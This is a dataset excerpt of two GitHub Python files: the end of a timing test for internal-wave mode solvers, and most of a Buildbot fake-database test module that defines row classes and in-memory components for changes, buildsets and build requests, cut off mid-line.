-z[::-1])\n#\nmode = 0\n#phi, cn,_,Z= IW(-500, 10., mode)\ntic = time()\nfor ii in range(500):\n phi, cn = iwave_modes(N2, dz)\nprint('Elapsed time dense method = {}'.format(time()-tic))\n\n\n\n## Test the unven spaced algorithm\n#sout = np.zeros(Z.shape[0]-1,)\n#sout[0] = 1.\n#for ii in range(1,sout.shape[0]):\n# sout[ii] = sout[ii-1]*1.0\n#\n#sout /= np.sum(sout)\n#dz = sout*d\n#znew = np.zeros(Z.shape)\n#znew[1:] = np.cumsum(-dz)\n#F = interpolate.interp1d(Z, IW.N2)\n#N2new = F(znew)\n#\n#phiall, cnall = iwave_modes_uneven(N2new, znew)\n\ntic = time()\ncnall = None\nfor ii in range(500):\n phiall, cnall = iwave_modes_sparse(N2, dz, v0=cnall,k=6)\nprint('Elapsed time sparse method = {}'.format(time()-tic))\n\nplt.figure()\nplt.plot(phi[:,mode], -z,lw=3)\nplt.plot(phiall[:,mode],-z, color='r')\nplt.text(0.1, 0.1, 'c_%d = %3.2f m/s\\nc_%d = %3.2f m/s'%(mode+1, cn[mode],mode+1,cnall[mode]), \\\n transform=plt.gca().transAxes)\nplt.show()\n", "repo_name": "mrayson/iwaves", "sub_path": "sandpit/test_iwaves.py", "file_name": "test_iwaves.py", "file_ext": "py", "file_size_in_byte": 8342, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.diag", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.linalg.eig", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 78, "usage_type": "call"}, {"api_name": "scipy.sparse.spdiags", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 93, "usage_type": "name"}, {"api_name": "scipy.sparse.spdiags", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 97, "usage_type": "name"}, {"api_name": "scipy.sparse.spdiags", "line_number": 98, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.eigsh", "line_number": 105, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg", "line_number": 105, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 148, "usage_type": "call"}, {"api_name": "scipy.linalg.eigh_tridiagonal", "line_number": 165, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 239, "usage_type": "call"}, {"api_name": "scipy.sparse.spdiags", "line_number": 260, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 260, "usage_type": "name"}, {"api_name": "scipy.sparse.spdiags", "line_number": 264, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 264, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.eigs", "line_number": 269, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg", "line_number": 269, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 269, "usage_type": "name"}, {"api_name": "numpy.power", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 318, "usage_type": "call"}, {"api_name": "time.time", "line_number": 339, "usage_type": "call"}, {"api_name": "time.time", "line_number": 342, "usage_type": "call"}, {"api_name": "time.time", "line_number": 361, "usage_type": "call"}, {"api_name": "time.time", "line_number": 365, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 367, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 367, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}]} +{"seq_id": "13056583406", "text": "import base64\nimport copy\n\nfrom buildbot.db import buildrequests\nfrom buildbot.util import datetime2epoch\nfrom buildbot.util import json\nfrom copy import deepcopy\nfrom twisted.internet import defer\nfrom twisted.internet import reactor\n\n# Fake DB Rows\n\n\nclass Row(object):\n\n \"\"\"\n Parent class for row classes, which are used to specify test data for\n database-related tests.\n\n @cvar defaults: default values for columns\n @type defaults: dictionary\n\n @cvar table: the table name\n\n @cvar id_column: specify a column that should be assigned an\n auto-incremented id. Auto-assigned id's begin at 1000, so any explicitly\n specified ID's should be less than 1000.\n\n @cvar required_columns: a tuple of columns that must be given in the\n constructor\n\n @ivar values: the values to be inserted into this row\n \"\"\"\n\n id_column = ()\n required_columns = ()\n lists = ()\n dicts = ()\n\n def __init__(self, **kwargs):\n self.values = self.defaults.copy()\n self.values.update(kwargs)\n if self.id_column:\n if self.values[self.id_column] is None:\n self.values[self.id_column] = self.nextId()\n for col in self.required_columns:\n assert col in kwargs, \"%s not specified: %s\" % (col, kwargs)\n for col in self.lists:\n setattr(self, col, [])\n for col in self.dicts:\n setattr(self, col, {})\n for col in kwargs.keys():\n assert col in self.defaults, \"%s is not a valid column\" % col\n # make the values appear as attributes\n self.__dict__.update(self.values)\n\n def nextId(self):\n if not hasattr(self.__class__, '_next_id'):\n self.__class__._next_id = 1000\n else:\n self.__class__._next_id += 1\n return self.__class__._next_id\n\n\nclass BuildRequest(Row):\n table = \"buildrequests\"\n\n defaults = dict(\n id=None,\n buildsetid=None,\n buildername=\"bldr\",\n priority=0,\n complete=0,\n results=-1,\n submitted_at=0,\n complete_at=0,\n )\n\n id_column = 'id'\n required_columns = ('buildsetid',)\n\n\nclass BuildRequestClaim(Row):\n table = \"buildrequest_claims\"\n\n defaults = dict(\n brid=None,\n objectid=None,\n claimed_at=None\n )\n\n required_columns = ('brid', 'objectid', 'claimed_at')\n\n\nclass Change(Row):\n table = \"changes\"\n\n defaults = dict(\n changeid=None,\n author='frank',\n comments='test change',\n is_dir=0,\n branch='master',\n revision='abcd',\n revlink='http://vc/abcd',\n when_timestamp=1200000,\n category='cat',\n repository='repo',\n codebase='',\n project='proj'\n )\n\n lists = ('files',)\n dicts = ('properties',)\n id_column = 'changeid'\n\n\nclass ChangeFile(Row):\n table = \"change_files\"\n\n defaults = dict(\n changeid=None,\n filename=None,\n )\n\n required_columns = ('changeid',)\n\n\nclass ChangeProperty(Row):\n table = \"change_properties\"\n\n defaults = dict(\n changeid=None,\n property_name=None,\n property_value=None,\n )\n\n required_columns = ('changeid',)\n\n\nclass ChangeUser(Row):\n table = \"change_users\"\n\n defaults = dict(\n changeid=None,\n uid=None,\n )\n\n required_columns = ('changeid',)\n\n\nclass Patch(Row):\n table = \"patches\"\n\n defaults = dict(\n id=None,\n patchlevel=0,\n patch_base64='aGVsbG8sIHdvcmxk', # 'hello, world',\n patch_author=None,\n patch_comment=None,\n subdir=None,\n )\n\n id_column = 'id'\n\n\nclass SourceStampChange(Row):\n table = \"sourcestamp_changes\"\n\n defaults = dict(\n sourcestampid=None,\n changeid=None,\n )\n\n required_columns = ('sourcestampid', 'changeid')\n\n\nclass SourceStampSet(Row):\n table = \"sourcestampsets\"\n defaults = dict(\n id=None,\n )\n id_column = 'id'\n\n\nclass SourceStamp(Row):\n table = \"sourcestamps\"\n\n defaults = dict(\n id=None,\n branch='master',\n revision='abcd',\n patchid=None,\n repository='repo',\n codebase='',\n project='proj',\n sourcestampsetid=None,\n )\n\n id_column = 'id'\n\n\nclass SchedulerChange(Row):\n table = \"scheduler_changes\"\n\n defaults = dict(\n objectid=None,\n changeid=None,\n important=1,\n )\n\n required_columns = ('objectid', 'changeid')\n\n\nclass Buildset(Row):\n table = \"buildsets\"\n\n defaults = dict(\n id=None,\n external_idstring='extid',\n reason='because',\n sourcestampsetid=None,\n submitted_at=12345678,\n complete=0,\n complete_at=None,\n results=-1,\n )\n\n id_column = 'id'\n required_columns = ('sourcestampsetid', )\n\n\nclass BuildsetProperty(Row):\n table = \"buildset_properties\"\n\n defaults = dict(\n buildsetid=None,\n property_name='prop',\n property_value='[22, \"fakedb\"]',\n )\n\n required_columns = ('buildsetid', )\n\n\nclass Buildslave(Row):\n table = \"buildslaves\"\n\n defaults = dict(\n id=None,\n name='slave1',\n info=None,\n )\n\n id_column = 'id'\n required_columns = ('name', )\n\n\nclass Object(Row):\n table = \"objects\"\n\n defaults = dict(\n id=None,\n name='nam',\n class_name='cls',\n )\n\n id_column = 'id'\n\n\nclass ObjectState(Row):\n table = \"object_state\"\n\n defaults = dict(\n objectid=None,\n name='nam',\n value_json='{}',\n )\n\n required_columns = ('objectid', )\n\n\nclass User(Row):\n table = \"users\"\n\n defaults = dict(\n uid=None,\n identifier='soap',\n bb_username=None,\n bb_password=None,\n )\n\n id_column = 'uid'\n\n\nclass UserInfo(Row):\n table = \"users_info\"\n\n defaults = dict(\n uid=None,\n attr_type='git',\n attr_data='Tyler Durden ',\n )\n\n required_columns = ('uid', )\n\n\nclass Build(Row):\n table = \"builds\"\n\n defaults = dict(\n id=None,\n number=29,\n brid=39,\n start_time=1304262222,\n finish_time=None)\n\n id_column = 'id'\n\n# Fake DB Components\n\n# TODO: test these using the same test methods as are used against the real\n# database\n\n\nclass FakeDBComponent(object):\n\n def __init__(self, db, testcase):\n self.db = db\n self.t = testcase\n self.setUp()\n\n\nclass FakeChangesComponent(FakeDBComponent):\n\n def setUp(self):\n self.changes = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Change):\n # copy this since we'll be modifying it (e.g., adding files)\n ch = self.changes[row.changeid] = copy.deepcopy(row.values)\n ch['files'] = []\n ch['properties'] = {}\n ch['uids'] = []\n\n elif isinstance(row, ChangeFile):\n ch = self.changes[row.changeid]\n ch['files'].append(row.filename)\n\n elif isinstance(row, ChangeProperty):\n ch = self.changes[row.changeid]\n n, vs = row.property_name, row.property_value\n v, s = json.loads(vs)\n ch['properties'][n] = (v, s)\n\n elif isinstance(row, ChangeUser):\n ch = self.changes[row.changeid]\n ch['uids'].append(row.uid)\n\n # component methods\n\n def addChange(self, author=None, files=None, comments=None, is_dir=0,\n revision=None, when_timestamp=None, branch=None,\n category=None, revlink='', properties={}, repository='',\n project='', codebase='', uid=None):\n if self.changes:\n changeid = max(self.changes.iterkeys()) + 1\n else:\n changeid = 500\n\n self.changes[changeid] = dict(\n changeid=changeid,\n author=author,\n comments=comments,\n is_dir=is_dir,\n revision=revision,\n when_timestamp=datetime2epoch(when_timestamp),\n branch=branch,\n category=category,\n revlink=revlink,\n repository=repository,\n project=project,\n codebase=codebase,\n files=files,\n properties=properties)\n\n return defer.succeed(changeid)\n\n def getLatestChangeid(self):\n if self.changes:\n return defer.succeed(max(self.changes.iterkeys()))\n return defer.succeed(None)\n\n def getChange(self, changeid):\n try:\n row = self.changes[changeid]\n except KeyError:\n return defer.succeed(None)\n\n return defer.succeed(self._chdict(row))\n\n def getChangeUids(self, changeid):\n try:\n ch_uids = self.changes[changeid]['uids']\n except KeyError:\n ch_uids = []\n return defer.succeed(ch_uids)\n\n def getRecentChanges(self, count):\n ids = sorted(self.changes.keys())\n chdicts = [self._chdict(self.changes[id]) for id in ids[-count:]]\n return defer.succeed(chdicts)\n\n def getChanges(self):\n chdicts = [self._chdict(v) for v in self.changes.values()]\n return defer.succeed(chdicts)\n\n def getChangesCount(self):\n return len(self.changes)\n\n def _chdict(self, row):\n chdict = row.copy()\n del chdict['uids']\n chdict['when_timestamp'] = _mkdt(chdict['when_timestamp'])\n return chdict\n\n # assertions\n\n def assertChange(self, changeid, row):\n row_only = self.changes[changeid].copy()\n del row_only['files']\n del row_only['properties']\n del row_only['uids']\n self.t.assertEqual(row_only, row.values)\n\n def assertChangeUsers(self, changeid, expectedUids):\n self.t.assertEqual(self.changes[changeid]['uids'], expectedUids)\n\n # fake methods\n\n def fakeAddChangeInstance(self, change):\n if not hasattr(change, 'number') or not change.number:\n if self.changes:\n changeid = max(self.changes.iterkeys()) + 1\n else:\n changeid = 500\n else:\n changeid = change.number\n\n # make a row from the change\n row = dict(\n changeid=changeid,\n author=change.who,\n files=change.files,\n comments=change.comments,\n is_dir=change.isdir,\n revision=change.revision,\n when_timestamp=change.when,\n branch=change.branch,\n category=change.category,\n revlink=change.revlink,\n properties=change.properties,\n repository=change.repository,\n codebase=change.codebase,\n project=change.project,\n uids=[])\n self.changes[changeid] = row\n\n\nclass FakeSchedulersComponent(FakeDBComponent):\n\n def setUp(self):\n self.states = {}\n self.classifications = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, SchedulerChange):\n cls = self.classifications.setdefault(row.objectid, {})\n cls[row.changeid] = row.important\n\n # component methods\n\n def classifyChanges(self, objectid, classifications):\n self.classifications.setdefault(objectid, {}).update(classifications)\n return defer.succeed(None)\n\n def flushChangeClassifications(self, objectid, less_than=None):\n if less_than is not None:\n classifications = self.classifications.setdefault(objectid, {})\n for changeid in classifications.keys():\n if changeid < less_than:\n del classifications[changeid]\n else:\n self.classifications[objectid] = {}\n return defer.succeed(None)\n\n def getChangeClassifications(self, objectid, branch=-1, repository=-1,\n project=-1, codebase=-1):\n classifications = self.classifications.setdefault(objectid, {})\n\n sentinel = dict(branch=object(), repository=object(),\n project=object(), codebase=object())\n\n if branch != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['branch'] == branch)\n\n if repository != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['repository'] == repository)\n\n if project != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['project'] == project)\n\n if codebase != -1:\n # filter out the classifications for the requested branch\n classifications = dict(\n (k, v) for (k, v) in classifications.iteritems()\n if self.db.changes.changes.get(k, sentinel)['codebase'] == codebase)\n\n return defer.succeed(classifications)\n\n # fake methods\n\n def fakeClassifications(self, objectid, classifications):\n \"\"\"Set the set of classifications for a scheduler\"\"\"\n self.classifications[objectid] = classifications\n\n # assertions\n\n def assertClassifications(self, objectid, classifications):\n self.t.assertEqual(\n self.classifications.get(objectid, {}),\n classifications)\n\n\nclass FakeSourceStampSetsComponent(FakeDBComponent):\n\n def setUp(self):\n self.sourcestampsets = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, SourceStampSet):\n self.sourcestampsets[row.id] = dict()\n\n def addSourceStampSet(self):\n id = len(self.sourcestampsets) + 100\n while id in self.sourcestampsets:\n id += 1\n self.sourcestampsets[id] = dict()\n return defer.succeed(id)\n\n\nclass FakeSourceStampsComponent(FakeDBComponent):\n\n def setUp(self):\n self.sourcestamps = {}\n self.patches = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Patch):\n self.patches[row.id] = dict(\n patch_level=row.patchlevel,\n patch_body=base64.b64decode(row.patch_base64),\n patch_author=row.patch_author,\n patch_comment=row.patch_comment,\n patch_subdir=row.subdir)\n\n for row in rows:\n if isinstance(row, SourceStamp):\n ss = self.sourcestamps[row.id] = row.values.copy()\n ss['changeids'] = set()\n\n for row in rows:\n if isinstance(row, SourceStampChange):\n ss = self.sourcestamps[row.sourcestampid]\n ss['changeids'].add(row.changeid)\n\n # component methods\n\n def addSourceStamp(self, branch, revision, repository, project, sourcestampsetid,\n codebase='', patch_body=None, patch_level=0, patch_author=None,\n patch_comment=None, patch_subdir=None, changeids=[]):\n id = len(self.sourcestamps) + 100\n while id in self.sourcestamps:\n id += 1\n\n changeids = set(changeids)\n\n if patch_body:\n patchid = len(self.patches) + 100\n while patchid in self.patches:\n patchid += 1\n self.patches[patchid] = dict(\n patch_level=patch_level,\n patch_body=patch_body,\n patch_subdir=patch_subdir,\n patch_author=patch_author,\n patch_comment=patch_comment\n )\n else:\n patchid = None\n\n self.sourcestamps[id] = dict(id=id, sourcestampsetid=sourcestampsetid, branch=branch, revision=revision, codebase=codebase,\n patchid=patchid, repository=repository, project=project,\n changeids=changeids)\n return defer.succeed(id)\n\n def getSourceStamp(self, ssid):\n return defer.succeed(self._getSourceStamp(ssid))\n\n def _getSourceStamp(self, ssid):\n if ssid in self.sourcestamps:\n ssdict = self.sourcestamps[ssid].copy()\n del ssdict['id']\n ssdict['ssid'] = ssid\n patchid = ssdict['patchid']\n if patchid:\n ssdict.update(self.patches[patchid])\n else:\n ssdict['patch_body'] = None\n ssdict['patch_level'] = None\n ssdict['patch_subdir'] = None\n ssdict['patch_author'] = None\n ssdict['patch_comment'] = None\n del ssdict['patchid']\n return ssdict\n else:\n return None\n\n def getSourceStamps(self, sourcestampsetid):\n sslist = []\n for ssdict in self.sourcestamps.itervalues():\n if ssdict['sourcestampsetid'] == sourcestampsetid:\n ssdictcpy = self._getSourceStamp(ssdict['id'])\n sslist.append(ssdictcpy)\n return defer.succeed(sslist)\n\n\nclass FakeBuildsetsComponent(FakeDBComponent):\n\n def setUp(self):\n self.buildsets = {}\n self.completed_bsids = set()\n self.buildset_subs = []\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Buildset):\n bs = self.buildsets[row.id] = row.values.copy()\n bs['properties'] = {}\n\n for row in rows:\n if isinstance(row, BuildsetProperty):\n assert row.buildsetid in self.buildsets\n n = row.property_name\n v, src = tuple(json.loads(row.property_value))\n self.buildsets[row.buildsetid]['properties'][n] = (v, src)\n\n # component methods\n\n def _newBsid(self):\n bsid = 200\n while bsid in self.buildsets:\n bsid += 1\n return bsid\n\n def addBuildset(self, sourcestampsetid, reason, properties, builderNames,\n external_idstring=None, _reactor=reactor):\n bsid = self._newBsid()\n br_rows = []\n for buildername in builderNames:\n br_rows.append(\n BuildRequest(buildsetid=bsid, buildername=buildername))\n self.db.buildrequests.insertTestData(br_rows)\n\n # make up a row and keep its dictionary, with the properties tacked on\n bsrow = Buildset(sourcestampsetid=sourcestampsetid, reason=reason, external_idstring=external_idstring)\n self.buildsets[bsid] = bsrow.values.copy()\n self.buildsets[bsid]['properties'] = properties\n\n return defer.succeed((bsid,\n dict([(br.buildername, br.id) for br in br_rows])))\n\n def completeBuildset(self, bsid, results, complete_at=None,\n _reactor=reactor):\n self.buildsets[bsid]['results'] = results\n self.buildsets[bsid]['complete'] = 1\n self.buildsets[bsid]['complete_at'] = complete_at or _reactor.seconds()\n return defer.succeed(None)\n\n def getBuildset(self, bsid):\n if bsid not in self.buildsets:\n return defer.succeed(None)\n row = self.buildsets[bsid]\n return defer.succeed(self._row2dict(row))\n\n def getBuildsets(self, complete=None):\n rv = []\n for bs in self.buildsets.itervalues():\n if complete is not None:\n if complete and bs['complete']:\n rv.append(self._row2dict(bs))\n elif not complete and not bs['complete']:\n rv.append(self._row2dict(bs))\n else:\n rv.append(self._row2dict(bs))\n return defer.succeed(rv)\n\n def _row2dict(self, row):\n row = row.copy()\n if row['complete_at']:\n row['complete_at'] = _mkdt(row['complete_at'])\n else:\n row['complete_at'] = None\n row['submitted_at'] = row['submitted_at'] and \\\n _mkdt(row['submitted_at'])\n row['complete'] = bool(row['complete'])\n row['bsid'] = row['id']\n del row['id']\n return row\n\n def getBuildsetProperties(self, buildsetid):\n if buildsetid in self.buildsets:\n return defer.succeed(\n self.buildsets[buildsetid]['properties'])\n else:\n return defer.succeed({})\n\n # fake methods\n\n def fakeBuildsetCompletion(self, bsid, result):\n assert bsid in self.buildsets\n self.buildsets[bsid]['results'] = result\n self.completed_bsids.add(bsid)\n\n def flushBuildsets(self):\n \"\"\"\n Flush the set of buildsets, for example after C{assertBuildset}\n \"\"\"\n self.buildsets = {}\n self.completed_bsids = set()\n\n # assertions\n\n def assertBuildsets(self, count):\n \"\"\"Assert that exactly COUNT buildsets were added\"\"\"\n self.t.assertEqual(len(self.buildsets), count,\n \"buildsets are %r\" % (self.buildsets,))\n\n def assertBuildset(self, bsid, expected_buildset, expected_sourcestamps):\n \"\"\"Assert that the buildset and its attached sourcestamp look as\n expected; the ssid parameter of the buildset is omitted. Properties\n are converted with asList and sorted. Sourcestamp patches are inlined\n (patch_body, patch_level, patch_subdir), and changeids are represented\n as a set, but omitted if empty. If bsid is '?', then assert there is\n only one new buildset, and use that.\"\"\"\n if bsid == '?':\n self.assertBuildsets(1)\n bsid = self.buildsets.keys()[0]\n else:\n self.t.assertIn(bsid, self.buildsets)\n\n buildset = self.buildsets[bsid].copy()\n\n dictOfssDict = {}\n for sourcestamp in self.db.sourcestamps.sourcestamps.itervalues():\n if sourcestamp['sourcestampsetid'] == buildset['sourcestampsetid']:\n ssdict = sourcestamp.copy()\n ss_repository = ssdict['codebase']\n dictOfssDict[ss_repository] = ssdict\n\n if 'id' in buildset:\n del buildset['id']\n\n # clear out some columns if the caller doesn't care\n for col in 'complete complete_at submitted_at results'.split():\n if col not in expected_buildset:\n del buildset[col]\n\n if buildset['properties']:\n buildset['properties'] = sorted(buildset['properties'].items())\n\n # only add brids if we're expecting them (sometimes they're unknown)\n if 'brids' in expected_buildset:\n buildset['brids'] = self.allBuildRequests(bsid)\n\n if 'builders' in expected_buildset:\n buildset['builders'] = self.allBuildRequests(bsid).keys()\n\n for ss in dictOfssDict.itervalues():\n if 'id' in ss:\n del ss['id']\n if not ss['changeids']:\n del ss['changeids']\n\n # incorporate patch info if we have it\n if 'patchid' in ss and ss['patchid']:\n ss.update(self.db.sourcestamps.patches[ss['patchid']])\n del ss['patchid']\n\n self.t.assertEqual(\n dict(buildset=buildset, sourcestamps=dictOfssDict),\n dict(buildset=expected_buildset, sourcestamps=expected_sourcestamps))\n return bsid\n\n def allBuildsetIds(self):\n return self.buildsets.keys()\n\n def allBuildRequests(self, bsid=None):\n if bsid is not None:\n is_same_bsid = lambda br: br.buildsetid == bsid\n else:\n is_same_bsid = lambda br: True\n return dict([(br.buildername, br.id)\n for br in self.db.buildrequests.reqs.values()\n if is_same_bsid(br)])\n\n\nclass FakeBuildslavesComponent(FakeDBComponent):\n\n def setUp(self):\n self.buildslaves = []\n self.id_num = 0\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Buildslave):\n self.buildslaves.append({\n 'name': row.name,\n 'slaveid': row.id,\n 'slaveinfo': row.info\n })\n\n def getBuildslaves(self):\n return defer.succeed([{\n 'name': s['name'],\n 'slaveid': s['slaveid'],\n } for s in self.buildslaves])\n\n def getBuildslaveByName(self, name):\n buildslave = self._getBuildslaveByName(name)\n if buildslave is not None:\n # XX: make a deep-copy to avoid side effects\n buildslave = deepcopy(buildslave)\n return defer.succeed(buildslave)\n\n def _getBuildslaveByName(self, name):\n for slave in self.buildslaves:\n if slave['name'] == name:\n return slave\n return None\n\n def updateBuildslave(self, name, slaveinfo):\n slaveinfo = deepcopy(slaveinfo)\n slave = self._getBuildslaveByName(name)\n if slave is None:\n self.insertTestData([\n Buildslave(name=name, info=slaveinfo)\n ])\n else:\n slave['slaveinfo'] = slaveinfo\n return defer.succeed(None)\n\n\nclass FakeStateComponent(FakeDBComponent):\n\n def setUp(self):\n self.objects = {}\n self.states = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Object):\n self.objects[(row.name, row.class_name)] = row.id\n self.states[row.id] = {}\n\n for row in rows:\n if isinstance(row, ObjectState):\n assert row.objectid in self.objects.values()\n self.states[row.objectid][row.name] = row.value_json\n\n # component methods\n\n def _newId(self):\n id = 100\n while id in self.states:\n id += 1\n return id\n\n def getObjectId(self, name, class_name):\n try:\n id = self.objects[(name, class_name)]\n except:\n # invent a new id and add it\n id = self.objects[(name, class_name)] = self._newId()\n self.states[id] = {}\n return defer.succeed(id)\n\n def getState(self, objectid, name, default=object):\n try:\n json_value = self.states[objectid][name]\n except KeyError:\n if default is not object:\n return defer.succeed(default)\n raise\n return defer.succeed(json.loads(json_value))\n\n def setState(self, objectid, name, value):\n self.states[objectid][name] = json.dumps(value)\n return defer.succeed(None)\n\n # fake methods\n\n def fakeState(self, name, class_name, **kwargs):\n id = self.objects[(name, class_name)] = self._newId()\n self.objects[(name, class_name)] = id\n self.states[id] = dict((k, json.dumps(v))\n for k, v in kwargs.iteritems())\n return id\n\n # assertions\n\n def assertState(self, objectid, missing_keys=[], **kwargs):\n state = self.states[objectid]\n for k in missing_keys:\n self.t.assertFalse(k in state, \"%s in %s\" % (k, state))\n for k, v in kwargs.iteritems():\n self.t.assertIn(k, state)\n self.t.assertEqual(json.loads(state[k]), v,\n \"state is %r\" % (state,))\n\n def assertStateByClass(self, name, class_name, **kwargs):\n objectid = self.objects[(name, class_name)]\n state = self.states[objectid]\n for k, v in kwargs.iteritems():\n self.t.assertIn(k, state)\n self.t.assertEqual(json.loads(state[k]), v,\n \"state is %r\" % (state,))\n\n\nclass FakeBuildRequestsComponent(FakeDBComponent):\n\n # for use in determining \"my\" requests\n MASTER_ID = 824\n\n # override this to set reactor.seconds\n _reactor = reactor\n\n def setUp(self):\n self.reqs = {}\n self.claims = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, BuildRequest):\n self.reqs[row.id] = row\n\n if isinstance(row, BuildRequestClaim):\n self.claims[row.brid] = row\n\n # component methods\n\n def getBuildRequest(self, brid):\n try:\n return defer.succeed(self._brdictFromRow(self.reqs[brid]))\n except:\n return defer.succeed(None)\n\n @defer.inlineCallbacks\n def getBuildRequests(self, buildername=None, complete=None, claimed=None,\n bsid=None, branch=None, repository=None):\n rv = []\n for br in self.reqs.itervalues():\n if buildername and br.buildername != buildername:\n continue\n if complete is not None:\n if complete and not br.complete:\n continue\n if not complete and br.complete:\n continue\n if claimed is not None:\n claim_row = self.claims.get(br.id)\n if claimed == \"mine\":\n if not claim_row or claim_row.objectid != self.MASTER_ID:\n continue\n elif claimed:\n if not claim_row:\n continue\n else:\n if br.complete or claim_row:\n continue\n if bsid is not None:\n if br.buildsetid != bsid:\n continue\n\n if branch or repository:\n buildset = yield self.db.buildsets.getBuildset(br.buildsetid)\n sourcestamps = yield self.db.sourcestamps.getSourceStamps(buildset['sourcestampsetid'])\n\n if branch and not any(branch == s['branch'] for s in sourcestamps):\n continue\n if repository and not any(repository == s['repository'] for s in sourcestamps):\n continue\n\n rv.append(self._brdictFromRow(br))\n defer.returnValue(rv)\n\n def claimBuildRequests(self, brids, claimed_at=None, _reactor=reactor):\n for brid in brids:\n if brid not in self.reqs or brid in self.claims:\n raise buildrequests.AlreadyClaimedError\n\n claimed_at = datetime2epoch(claimed_at)\n if not claimed_at:\n claimed_at = _reactor.seconds()\n\n # now that we've thrown any necessary exceptions, get started\n for brid in brids:\n self.claims[brid] = BuildRequestClaim(brid=brid,\n objectid=self.MASTER_ID, claimed_at=claimed_at)\n return defer.succeed(None)\n\n def reclaimBuildRequests(self, brids, _reactor):\n for brid in brids:\n if brid in self.claims and self.claims[brid].objectid != self.MASTER_ID:\n raise buildrequests.AlreadyClaimedError\n\n # now that we've thrown any necessary exceptions, get started\n for brid in brids:\n self.claims[brid] = BuildRequestClaim(brid=brid,\n objectid=self.MASTER_ID, claimed_at=_reactor.seconds())\n return defer.succeed(None)\n\n def unclaimBuildRequests(self, brids):\n for brid in brids:\n if brid in self.claims and self.claims[brid].objectid == 